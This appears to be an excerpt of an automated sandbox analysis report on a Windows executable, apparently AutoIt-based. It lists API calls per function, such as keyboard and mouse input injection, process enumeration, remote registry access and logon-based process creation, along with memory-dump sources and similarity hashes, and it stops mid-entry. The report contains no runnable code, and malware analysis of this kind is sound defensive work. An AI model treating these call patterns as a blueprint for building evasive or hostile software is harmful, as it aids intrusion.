• Instruction Fuzzy Hash: DF413A71900B259BEB169F68FA4575CB7B4BF01335F118219E425EF2E1D7749940CB82
APIs
• DeleteObject.GDI32(00000000), ref: 00368EE4
• GetDC.USER32(00000000), ref: 00368EEC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00368EF7
• ReleaseDC.USER32(00000000,00000000), ref: 00368F03
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00368F3F
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00368F50
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0036BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00368F8A
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00368FAA
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 4e51324efd1c5d0e31e3df6b85538b3188272eb68b5fe653be69328ae134db32
• Instruction ID: e3a01c83949b9c87f2fa1446e85e4187b127859ba3d563b6eb3d22ed38d26b24
• Opcode Fuzzy Hash: 4e51324efd1c5d0e31e3df6b85538b3188272eb68b5fe653be69328ae134db32
• Instruction Fuzzy Hash: 31317C72200214BFEB128F50DC49FAA3BAEEF49711F0541A5FE089E195D6B59841CB70
APIs
  • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
• GetSystemMetrics.USER32(0000000F), ref: 0037016D
• MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0037038D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003703AB
• InvalidateRect.USER32(?,00000000,00000001,?), ref: 003703D6
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003703FF
• ShowWindow.USER32(00000003,00000000), ref: 00370421
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00370440
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
• String ID:
• API String ID: 3356174886-0
• Opcode ID: 850e8b2e86571f1bee822ca00a19c8fd9f7d8472c6063037aa0fad7e7e80ce74
• Instruction ID: c929ba91c0e49ae8e2c4022bb5941bf4b4d3f088ed0026b9a39baec9459ba2fe
• Opcode Fuzzy Hash: 850e8b2e86571f1bee822ca00a19c8fd9f7d8472c6063037aa0fad7e7e80ce74
• Instruction Fuzzy Hash: 94A1AF35600616EBEB2ECF68C9857BDBBB5BF08700F05C155EC58AB291D778AD60CB90
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca0e142d7596c6e4a53caee92d57a3578389915b4c4df0a40eeaf156ede8ae3b
• Instruction ID: 5dd1350833ab1048c68a2f53f2d5202140a94c7861ef0afd7b4cbcbd05bc2274
• Opcode Fuzzy Hash: ca0e142d7596c6e4a53caee92d57a3578389915b4c4df0a40eeaf156ede8ae3b
• Instruction Fuzzy Hash: 65718EB0901509EFCB1ACF98CC48AEEBB79FF89311F148149F915AA251C3349A52CF61
APIs
• _memset.LIBCMT ref: 0036225A
• _memset.LIBCMT ref: 00362323
• ShellExecuteExW.SHELL32(?), ref: 00362368
  • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
  • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
  • Part of subcall function 0031C6F4: _wcscpy.LIBCMT ref: 0031C717
• CloseHandle.KERNEL32(00000000), ref: 0036242F
• FreeLibrary.KERNEL32(00000000), ref: 0036243E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
• Opcode ID: 9b1911bb20c0b63c731dd51364350d0c0dee5519c15fcb2e085d467340f7ed8b
• Instruction ID: cb1d831895be6571cf3930926137393eb4af3af236e198b07fe470e8ec91c242
• Opcode Fuzzy Hash: 9b1911bb20c0b63c731dd51364350d0c0dee5519c15fcb2e085d467340f7ed8b
• Instruction Fuzzy Hash: 1E716F74A006199FCF06EFA4C995AAEBBF5FF48310F118459E855AB391CB34AD40CF94
APIs
• GetParent.USER32(00000000), ref: 00343C02
• GetKeyboardState.USER32(?), ref: 00343C17
• SetKeyboardState.USER32(?), ref: 00343C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00343CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00343CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00343D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00343D26
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 291830c9f6a722705c65fbcd4a91d2aeb366a02f6022e99a95fbae3b84044d77
• Instruction ID: e053f94dbca3b7cc806cff2ae4c226282bce67502b2654e63c6823c4e02f4f9a
• Opcode Fuzzy Hash: 291830c9f6a722705c65fbcd4a91d2aeb366a02f6022e99a95fbae3b84044d77
• Instruction Fuzzy Hash: A551B3A09047D539FB3787648C55BBABFE9AB06304F088489E0D55F8C2D694FE94D760
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00368FE7
• GetWindowLongW.USER32(00D1EDF8,000000F0), ref: 0036901A
• GetWindowLongW.USER32(00D1EDF8,000000F0), ref: 0036904F
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00369081
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003690AB
• GetWindowLongW.USER32(00000000,000000F0), ref: 003690BC
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003690D6
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: d62d394f4ce47ca6a35cbe1f8c7e394dff566662f26dbf0ca7f00c9bb0f954be
• Instruction ID: eefae5a12bd9ebcd4a7011f8dfc522732ecc1d86925e655ce014f538410afd7b
• Opcode Fuzzy Hash: d62d394f4ce47ca6a35cbe1f8c7e394dff566662f26dbf0ca7f00c9bb0f954be
• Instruction Fuzzy Hash: 0D313534600215EFDB22CF58DC84F6477A9FB4A718F1582A6F919CF2B6CB71A850DB41
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003408F2
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00340918
• SysAllocString.OLEAUT32(00000000), ref: 0034091B
• SysAllocString.OLEAUT32(?), ref: 00340939
• SysFreeString.OLEAUT32(?), ref: 00340942
• StringFromGUID2.OLE32(?,?,00000028), ref: 00340967
• SysAllocString.OLEAUT32(?), ref: 00340975
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 2840bf1e071b52b2e5ab91d108cad4213bd846a3b83ad51a9b1a373c0af51115
• Instruction ID: e87c6c72f98f02f5f7263fdbe908fe2d38dee5355db5d611b527a2b252221d7d
• Opcode Fuzzy Hash: 2840bf1e071b52b2e5ab91d108cad4213bd846a3b83ad51a9b1a373c0af51115
• Instruction Fuzzy Hash: 8A21A676600208AFDB159F78DC88DAB73ECEB09360B048125FA15DF1A1D770EC418760
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 9ff2c26d1a81e7bda9a5a956d848772d0d701758a7935b6f4d096f23fdc270cf
• Instruction ID: 7f0b93c5b8a11d91474367621a1732ec52ab96527d4aee09aff7487b9b97da7d
• Opcode Fuzzy Hash: 9ff2c26d1a81e7bda9a5a956d848772d0d701758a7935b6f4d096f23fdc270cf
• Instruction Fuzzy Hash: F421497224422177C737AA359C12FBBB3DCEF66310F914029F446BF182E661AD82C3A5
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003409CB
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003409F1
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 003409F4
                                                                            • SysAllocString.OLEAUT32 ref: 00340A15
                                                                            • SysFreeString.OLEAUT32 ref: 00340A1E
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00340A38
                                                                            • SysAllocString.OLEAUT32(?), ref: 00340A46
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 4a1a098d9fc6d1e353c3819b50426b6b19a9ba24f0e46e9e529bf87563c46d5f
• Instruction ID: 50edb01d83455ec6b3332125556104cba0a05cafef2a8a2c06083eec007113d8
• Opcode Fuzzy Hash: 4a1a098d9fc6d1e353c3819b50426b6b19a9ba24f0e46e9e529bf87563c46d5f
• Instruction Fuzzy Hash: 7F217475300204AFDB15AFB9DD88DAA77ECEF48360B058125FA09CF2A1DA70EC418B64
APIs
  • Part of subcall function 0031D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031D1BA
  • Part of subcall function 0031D17C: GetStockObject.GDI32(00000011), ref: 0031D1CE
  • Part of subcall function 0031D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031D1D8
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0036A32D
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0036A33A
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0036A345
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0036A354
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0036A360
Strings
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: ef53d49e8dc0d66388dbe14626d393af82338c65f2d06ad319b1bd38ab28eab3
• Instruction ID: 9718169c9ef3fddcef25bc9b414cb1ffd94fe19c495d4c7c0fff119bba8eb00e
• Opcode Fuzzy Hash: ef53d49e8dc0d66388dbe14626d393af82338c65f2d06ad319b1bd38ab28eab3
• Instruction Fuzzy Hash: 1C1190B5150219BEEF169F60CC85EEB7F6DFF09798F018114FA08A61A0C7729C21DBA4
APIs
• GetClientRect.USER32(?,?), ref: 0031CCF6
• GetWindowRect.USER32(?,?), ref: 0031CD37
• ScreenToClient.USER32(?,?), ref: 0031CD5F
• GetClientRect.USER32(?,?), ref: 0031CE8C
• GetWindowRect.USER32(?,?), ref: 0031CEA5
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: 6b1052016fdf646980d8bdbac496163ef35380e0303977a4b8667497d18e35c3
• Instruction ID: 932f7d72efc8cec83f9d383abbe0debb74625e32c6638bbc6bfcf84573501bec
• Opcode Fuzzy Hash: 6b1052016fdf646980d8bdbac496163ef35380e0303977a4b8667497d18e35c3
• Instruction Fuzzy Hash: B9B16B79910249DBDF25CFA8C4807EEBBB5FF08300F15A169EC59EB650DB34A990CB64
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00361C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00361C26
• __wsplitpath.LIBCMT ref: 00361C54
  • Part of subcall function 00321DFC: __wsplitpath_helper.LIBCMT ref: 00321E3C
• _wcscat.LIBCMT ref: 00361C69
• Process32NextW.KERNEL32(00000000,?), ref: 00361CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00361CF1
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 1380811348-0
• Opcode ID: 060dd4c199657cfe4b6ceb95921f8f9cf877747fa7862f670d0f23a052abffa3
• Instruction ID: abfb87c1f8f7ee7102173b132c17d9cfb8d38902daf194eac346ce55486d1c46
• Opcode Fuzzy Hash: 060dd4c199657cfe4b6ceb95921f8f9cf877747fa7862f670d0f23a052abffa3
• Instruction Fuzzy Hash: 3A517EB15043009FD726EF24D895EABB7ECEF88754F04491EF5859B291EB70DA04CB92
APIs
  • Part of subcall function 00363C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003630AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003630EF
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00363112
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0036313B
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0036317E
• RegCloseKey.ADVAPI32(00000000), ref: 0036318B
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 3451389628-0
• Opcode ID: d8ed2ed7d426f665d9ca398454aedd5065f4aa47b52c01172717bb6d2e5c0974
• Instruction ID: 7c05d7dc272d84181823e4f52fb4bfad956bbdf77165abb6217330b92d4f13e7
• Opcode Fuzzy Hash: d8ed2ed7d426f665d9ca398454aedd5065f4aa47b52c01172717bb6d2e5c0974
• Instruction Fuzzy Hash: 89516971109300AFC706EF64C895E6ABBF9FF89300F04895DF5558B2A1DB71EA09CB52
APIs
• GetMenu.USER32(?), ref: 00368540
• GetMenuItemCount.USER32(00000000), ref: 00368577
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0036859F
• GetMenuItemID.USER32(?,?), ref: 0036860E
• GetSubMenu.USER32(?,?), ref: 0036861C
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0036866D
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: 64d93612879455eb956b3d635cb3874f0e136e2eb62e6186597a092c6788630f
• Instruction ID: afb0b7c70e663e36d66de318f45566c813d2d5adef41993c1d449fb9cfca8ab4
• Opcode Fuzzy Hash: 64d93612879455eb956b3d635cb3874f0e136e2eb62e6186597a092c6788630f
• Instruction Fuzzy Hash: 8851A271A00214AFCF12DF54C845AAEB7F4EF4C310F118599EA16BB391DB70AE418B91
APIs
• _memset.LIBCMT ref: 00344B10
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00344B5B
• IsMenu.USER32(00000000), ref: 00344B7B
• CreatePopupMenu.USER32 ref: 00344BAF
• GetMenuItemCount.USER32(000000FF), ref: 00344C0D
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00344C3E
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: 8d77fa5c38d22917405e713358b9edb4630e709c8805a0907729167e7d90a2bb
• Instruction ID: 22e984354cb9d7e241ec737cefa303257a1864cc008735588bd6d0cffaefecab
• Opcode Fuzzy Hash: 8d77fa5c38d22917405e713358b9edb4630e709c8805a0907729167e7d90a2bb
• Instruction Fuzzy Hash: E551CD70A01319EBDF22CF68D8C8BADBBF8EF45318F188169E4559E291E370AD44CB51
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0039DC00), ref: 00358E7C
• WSAGetLastError.WSOCK32(00000000), ref: 00358E89
• __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00358EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 00358EC5
• _strlen.LIBCMT ref: 00358EF7
• WSAGetLastError.WSOCK32(00000000), ref: 00358F6A
Similarity
• API ID: ErrorLast$_strlenselect
• String ID:
• API String ID: 2217125717-0
• Opcode ID: 315958f7dc5230d6b3b57b27deaeb795aa08f2f436cd12e88ccca7a649539f50
• Instruction ID: a0eeb0e4cbf49b17c728068b05aec7e5719576cc255e613fad593f9b1b9bb37f
• Opcode Fuzzy Hash: 315958f7dc5230d6b3b57b27deaeb795aa08f2f436cd12e88ccca7a649539f50
• Instruction Fuzzy Hash: 8241C271501204AFCB06EFA4DD96EAEB7BDAF48311F104659F516AB2E1DF30AE04CB60
APIs
  • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
• BeginPaint.USER32(?,?,?), ref: 0031AC2A
• GetWindowRect.USER32(?,?), ref: 0031AC8E
• ScreenToClient.USER32(?,?), ref: 0031ACAB
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0031ACBC
• EndPaint.USER32(?,?,?,?,?), ref: 0031AD06
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0037E673
                                                                            Similarity
                                                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 2592858361-0
                                                                            • Opcode ID: 2e8800657b3d69b741438b70dd4f6c2ee19934dcde6e02a1118b14127c17a18a
                                                                            • Instruction ID: 0ffe3192692d0decdd53f720295ce5ce4f1c9eca1313b38ea814d5d05ed89949
                                                                            • Opcode Fuzzy Hash: 2e8800657b3d69b741438b70dd4f6c2ee19934dcde6e02a1118b14127c17a18a
                                                                            • Instruction Fuzzy Hash: AD41B0711057009FC722DF24DC84FA67BACEF5E721F040669F9A4C62A2C330A895DBA2
                                                                            APIs
                                                                            • ShowWindow.USER32(003C1628,00000000,003C1628,00000000,00000000,003C1628,?,0037DC5D,00000000,?,00000000,00000000,00000000,?,0037DAD1,00000004), ref: 0036E40B
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 0036E42F
                                                                            • ShowWindow.USER32(003C1628,00000000), ref: 0036E48F
                                                                            • ShowWindow.USER32(00000000,00000004), ref: 0036E4A1
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 0036E4C5
                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0036E4E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: d99ac60732b0149bb33553537df501d7fa730e7e8b3a55299b40ea87b51b1dc2
                                                                            • Instruction ID: bc5dc566971262a13ad99191ba9f27f2c5a0d821ee808dd8b4b072b48b8a817c
                                                                            • Opcode Fuzzy Hash: d99ac60732b0149bb33553537df501d7fa730e7e8b3a55299b40ea87b51b1dc2
                                                                            • Instruction Fuzzy Hash: 9E416F38601150EFDB27CF35C499B947BE1BF0A704F5981A9FA588F2A6CB31E849CB51
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 003498D1
                                                                              • Part of subcall function 0031F4EA: std::exception::exception.LIBCMT ref: 0031F51E
                                                                              • Part of subcall function 0031F4EA: __CxxThrowException@8.LIBCMT ref: 0031F533
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00349908
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00349924
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0034999E
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003499B3
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 003499D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 2537439066-0
                                                                            • Opcode ID: 1b300bb931b1382ec8f341d5222919643fb7b230b5211228b90209e7f354884f
                                                                            • Instruction ID: 6b9a8da730854dd13928f090a11731cbd7295b219d5b5f0cf921c3c663f66039
                                                                            • Opcode Fuzzy Hash: 1b300bb931b1382ec8f341d5222919643fb7b230b5211228b90209e7f354884f
                                                                            • Instruction Fuzzy Hash: 88315231900205EFDB12AF95DC85EAB77B8FF45310F1480A9E904AF296DB74DA50DBA0
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,003577F4,?,?,00000000,00000001), ref: 00359B53
                                                                              • Part of subcall function 00356544: GetWindowRect.USER32(?,?), ref: 00356557
                                                                            • GetDesktopWindow.USER32 ref: 00359B7D
                                                                            • GetWindowRect.USER32(00000000), ref: 00359B84
                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00359BB6
                                                                              • Part of subcall function 00347A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347AD0
                                                                            • GetCursorPos.USER32(?), ref: 00359BE2
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00359C44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 93067ae57987e514657e5e9b9d0e36ccb609254a89355f890e89f80453bf2162
                                                                            • Instruction ID: 5bb82a271dc31ea5545e288c6247dfc7a21ddeca035f3c0e8eab8f3696845702
                                                                            • Opcode Fuzzy Hash: 93067ae57987e514657e5e9b9d0e36ccb609254a89355f890e89f80453bf2162
                                                                            • Instruction Fuzzy Hash: 8C31BC7210430AABD711DF14D849F9AB7EDFF89314F01091AF9859B191DA31EA088B92
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0033AFAE
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0033AFB5
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0033AFC4
                                                                            • CloseHandle.KERNEL32(00000004), ref: 0033AFCF
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0033AFFE
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 0033B012
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
